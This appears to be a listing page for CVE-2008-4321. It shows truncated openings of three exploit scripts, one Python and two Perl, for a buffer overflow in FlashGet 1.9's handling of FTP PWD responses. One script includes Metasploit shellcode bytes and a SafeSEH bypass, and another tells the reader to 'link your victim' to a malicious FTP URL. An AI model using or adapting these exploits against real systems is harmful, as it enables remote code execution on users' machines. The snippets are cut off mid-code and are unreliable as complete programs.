CVE-2008-4321

#!/usr/bin/python # FlashGet 19 (FTP PWD Response) 0day Remote Buffer Overflow PoC Exploit # Bug discovered by Krystian Kloskowski (h07) <h07@interiapl> # Testen on: FlashGet 19 / XP SP2 Polish # Product URL: wwwflashgetcom/en/downloadhtm?uid=undefined # Details: # # 257 "[AAAA332]/" is current directory\r\n <-- overflow ...

#!/usr/bin/perl # k`sOSe 08/17/2008 # bypass safeseh using flash9focx use warnings; use strict; use IO::Socket; # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub metasploitcom my $shellcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6b" "\xa3\x03\x10\x83\xeb\xfc\xe2\xf4\x97\x4b\x47\x10\x6b\xa3\ ...

#!/usr/bin/perl # FlashGet 1901012 (FTP PWD Response) SEH STACK Overflow Exploit # Coded By SkOd, skoduk at gmail dot com # Tested over Windows XP sp1 Hebrew # link your victim to - ftp://localhost/somefileTORRENT - over internet explorer ## # PoC by Krystian Kloskowski (h07) <h07@interiapl> # milw0rmcom/exploits/6240 ## # sp ...